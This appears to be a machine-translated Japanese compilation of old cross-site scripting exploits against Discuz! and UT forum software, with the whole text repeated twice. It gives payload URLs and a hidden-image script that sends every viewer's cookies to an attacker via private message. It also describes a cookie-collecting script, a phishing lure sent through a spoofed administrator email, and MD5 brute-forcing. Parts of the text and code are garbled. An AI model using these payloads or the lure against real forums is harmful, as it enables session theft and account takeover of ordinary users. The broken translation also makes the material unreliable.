PHP有名オープンソースフォーラム:Discuz!駅を跨ぐ大全
discuzにいますの貼り付け、貼り付け、PMなどのsubjectはフィルタリングされていませんので、コードを追加することもできます。
例えば
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22
効果はまず自分のクッキーをはじきます。
利用方法:上記のコードをimgに入れる。
適用バージョン:discuz!2.x
discuz!3.x
discuzを利用します。2.0ホールを騙してクッキーを獲得する試み
XFanフォーラムのPM機能をテストすることによって、セキュリティ・ホールが存在します。
XXFanのある会員へのひそかなリンクは以下の通りです。
http://XXX/pm.php?action=send&username=XXXFan
フォーラムプログラムは会員名をフィルタではなく、直接に欄に送るので、名前の後にスクリプトコードを付けることができます。例えば
http://XXX/pm.php?action=send&username=XXXFan ";>alert(document.co co okie) 上のリンクをクリックしてまずポップアップしたのは自分のクッキーの内容です。
もちろん、まず自分のサイトでクッキーを収集するプログラムを作ります。
get cookie.php?cookie=
しかし、どのように会員をクリックするように誘導しますか?簡単にフォーラムに置くと、識別されやすいです。だから、discuzフォーラムのプログラムのもう一つの機能を利用して、「友達に紹介する」機能があります。
discuzのこの機能は記入されたemailアドレスに対してフィルタ、識別、モデルを一切していないので、誰かを偽造して他人に送信することができます。安全性が高いです。この機能を利用して、私達はExploid Fanの管理人を偽造して、ある会員に私達の用意したURLをクリックさせます。誘導すれば自分の手段を見ます。例えば、「フォーラムは新しい機能をテストしています。上の住所をクリックしてください。私達は楽屋であなたのクリックを記録します。適切な時間にポイントを増やしてご褒美を作ります。」などと言ってもいいです。
リンク先はXXXFanのもので、発信者とメールアドレスはXXXFanの公式アドレスであるため、信頼度が非常に高く、柄が残らない。もちろん、より高い安全性のために、「script」の中のコンテンツを暗号化して、さらに隠蔽性を高めることができます。
クッキーを得るにはどうすればクッキーの騙しを試したり、MD 5のパスワードを暴力的に解読したりすることができます。
この方法は大部分がdiscuz 2.0を使うフォーラムに適用されます。discuz 3.0の利用方法については以前に発表したdiscuzに参加してください。内緒話の抜け穴
【BUG】Discuz投票のバグ
投票は可能です
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n
(nはオプションで、0から開始します。)
の方式はURLで直接投票します。
でも、もしn>最大の選択肢は?
そのまま提出しましたが、タイトルが空のオプションが追加されました。
効果は次の通りです
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc
(その最後の空白は私が入れたばかりです)
このバグのバージョン:
Discuz3.X
Discuz2.X(おそらく、テストしたことがない)
Discuzコードホール
これは昨日発見された穴に続き、第一発見者(PK 0909)です。
具体的な説明はもちろん、以下は簡単なテストコードです。
http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E
上のコードは自分のクッキーを表示します。
次はある有名なフォーラムのテストコードです。誰がこのページを見ても、クッキーを指定された会員のショートポストに送ります。隠蔽性がいいです。もし誰かがあなたのシールを引用したら、ハハ~ここは全部飛び出してきます。
[ [img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22 MSXML 2.XMLHTTP% 22)Req.open(%22 posts%22、%22http://www.XXXX.com/forum/pm.php?action=send%22を選択しますvar%20 forms=%22 pm Submit=Submit%22 toLowerCase()%2 B%22%26 msgto=XXXXXXXX%26 subject=cookie%26 saveoutbox=0%26 message=%22%2 Bescate(document.co okie);Req.set Request Header(%22 Content-length%22,forms.length)%3 BREeq.set Request Header(%22 CONTENT-TYPE%22,%22 pplication/x-wn-form-urlencodd%22);Req.send(forms);%3 c/script%3 e%3 cb%22 [ /[img]
discuzを発見!UT ドメインをまたぐサイトのスクリプト・ホール――ショートメッセージ編はドメインをまたぐサイトのスクリプト・ホールに関して、すでに非常に平成で普遍的なホールとなっています。
詳細については以下を参照してください。
http://www.cert.org/advisories/CA-2000-02.html
以下、Discuz、UTフォーラムプログラムの隠語部分について説明します。
脆弱性のバージョン:
Disccuz 1.X
Discuz2.0(0699,0820版)
Discuz3.X
UT 1.0
脆弱性の説明:
discuz!指定された会員には内緒話を送るのと同じです。http://www.XXXX.net/phpbbs/pm.php?action=send&username=name しかし、nameはフィルタなしでショートメッセージを送信するページに直接表示されます。これはcookieを盗んだり、より深刻な破壊に便利なドアを開けました。
Discuz3.Xはすでにhttp://XXX.net/pm.php?action=send&uid=XXXX似たような語句は、このような抜け穴を避けましたが、メールフォルダを選択する際にフィルタリングされませんでした。同様に上のような穴ができた。
例
http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3 E%3 Cscript%3 Ealert%3 C/script%3 E%3 Cb%22[/url]
以上の例は、自分のクッキーを表示することです。Discuzに対して1.X Discuz2.X)
http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22
自分のクッキーを表示します。Discuzに対して3.X)
UTはテーマにフィルターをかけましたが、つまり%27を'に変換します。しかし、受信者はフィルタリングされていないので、同じような穴があります。例略異なるUTフォーラムでコードが同じではないことが分かりましたが、全体的に似たような穴があります。)
危害度:中弱
予防方法:
ハイパーリンクをクリックする時は、その内容に注意してください。より多くのセキュリティパッチは、公式フォーラムに注目してください。
例えば
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22
効果はまず自分のクッキーをはじきます。
利用方法:上記のコードをimgに入れる。
適用バージョン:discuz!2.x
discuz!3.x
discuzを利用します。2.0ホールを騙してクッキーを獲得する試み
XFanフォーラムのPM機能をテストすることによって、セキュリティ・ホールが存在します。
XXFanのある会員へのひそかなリンクは以下の通りです。
http://XXX/pm.php?action=send&username=XXXFan
フォーラムプログラムは会員名をフィルタではなく、直接に欄に送るので、名前の後にスクリプトコードを付けることができます。例えば
http://XXX/pm.php?action=send&username=XXXFan ";>
もちろん、まず自分のサイトでクッキーを収集するプログラムを作ります。
get cookie.php?cookie=
しかし、どのように会員をクリックするように誘導しますか?簡単にフォーラムに置くと、識別されやすいです。だから、discuzフォーラムのプログラムのもう一つの機能を利用して、「友達に紹介する」機能があります。
discuzのこの機能は記入されたemailアドレスに対してフィルタ、識別、モデルを一切していないので、誰かを偽造して他人に送信することができます。安全性が高いです。この機能を利用して、私達はExploid Fanの管理人を偽造して、ある会員に私達の用意したURLをクリックさせます。誘導すれば自分の手段を見ます。例えば、「フォーラムは新しい機能をテストしています。上の住所をクリックしてください。私達は楽屋であなたのクリックを記録します。適切な時間にポイントを増やしてご褒美を作ります。」などと言ってもいいです。
リンク先はXXXFanのもので、発信者とメールアドレスはXXXFanの公式アドレスであるため、信頼度が非常に高く、柄が残らない。もちろん、より高い安全性のために、「script」の中のコンテンツを暗号化して、さらに隠蔽性を高めることができます。
クッキーを得るにはどうすればクッキーの騙しを試したり、MD 5のパスワードを暴力的に解読したりすることができます。
この方法は大部分がdiscuz 2.0を使うフォーラムに適用されます。discuz 3.0の利用方法については以前に発表したdiscuzに参加してください。内緒話の抜け穴
【BUG】Discuz投票のバグ
投票は可能です
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n
(nはオプションで、0から開始します。)
の方式はURLで直接投票します。
でも、もしn>最大の選択肢は?
そのまま提出しましたが、タイトルが空のオプションが追加されました。
効果は次の通りです
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc
(その最後の空白は私が入れたばかりです)
このバグのバージョン:
Discuz3.X
Discuz2.X(おそらく、テストしたことがない)
Discuzコードホール
これは昨日発見された穴に続き、第一発見者(PK 0909)です。
具体的な説明はもちろん、以下は簡単なテストコードです。
http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E
上のコードは自分のクッキーを表示します。
次はある有名なフォーラムのテストコードです。誰がこのページを見ても、クッキーを指定された会員のショートポストに送ります。隠蔽性がいいです。もし誰かがあなたのシールを引用したら、ハハ~ここは全部飛び出してきます。
[ [img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22 MSXML 2.XMLHTTP% 22)Req.open(%22 posts%22、%22http://www.XXXX.com/forum/pm.php?action=send%22を選択しますvar%20 forms=%22 pm Submit=Submit%22 toLowerCase()%2 B%22%26 msgto=XXXXXXXX%26 subject=cookie%26 saveoutbox=0%26 message=%22%2 Bescate(document.co okie);Req.set Request Header(%22 Content-length%22,forms.length)%3 BREeq.set Request Header(%22 CONTENT-TYPE%22,%22 pplication/x-wn-form-urlencodd%22);Req.send(forms);%3 c/script%3 e%3 cb%22 [ /[img]
discuzを発見!UT ドメインをまたぐサイトのスクリプト・ホール――ショートメッセージ編はドメインをまたぐサイトのスクリプト・ホールに関して、すでに非常に平成で普遍的なホールとなっています。
詳細については以下を参照してください。
http://www.cert.org/advisories/CA-2000-02.html
以下、Discuz、UTフォーラムプログラムの隠語部分について説明します。
脆弱性のバージョン:
Disccuz 1.X
Discuz2.0(0699,0820版)
Discuz3.X
UT 1.0
脆弱性の説明:
discuz!指定された会員には内緒話を送るのと同じです。http://www.XXXX.net/phpbbs/pm.php?action=send&username=name しかし、nameはフィルタなしでショートメッセージを送信するページに直接表示されます。これはcookieを盗んだり、より深刻な破壊に便利なドアを開けました。
Discuz3.Xはすでにhttp://XXX.net/pm.php?action=send&uid=XXXX似たような語句は、このような抜け穴を避けましたが、メールフォルダを選択する際にフィルタリングされませんでした。同様に上のような穴ができた。
例
http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3 E%3 Cscript%3 Ealert%3 C/script%3 E%3 Cb%22[/url]
以上の例は、自分のクッキーを表示することです。Discuzに対して1.X Discuz2.X)
http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22
自分のクッキーを表示します。Discuzに対して3.X)
UTはテーマにフィルターをかけましたが、つまり%27を'に変換します。しかし、受信者はフィルタリングされていないので、同じような穴があります。例略異なるUTフォーラムでコードが同じではないことが分かりましたが、全体的に似たような穴があります。)
危害度:中弱
予防方法:
ハイパーリンクをクリックする時は、その内容に注意してください。より多くのセキュリティパッチは、公式フォーラムに注目してください。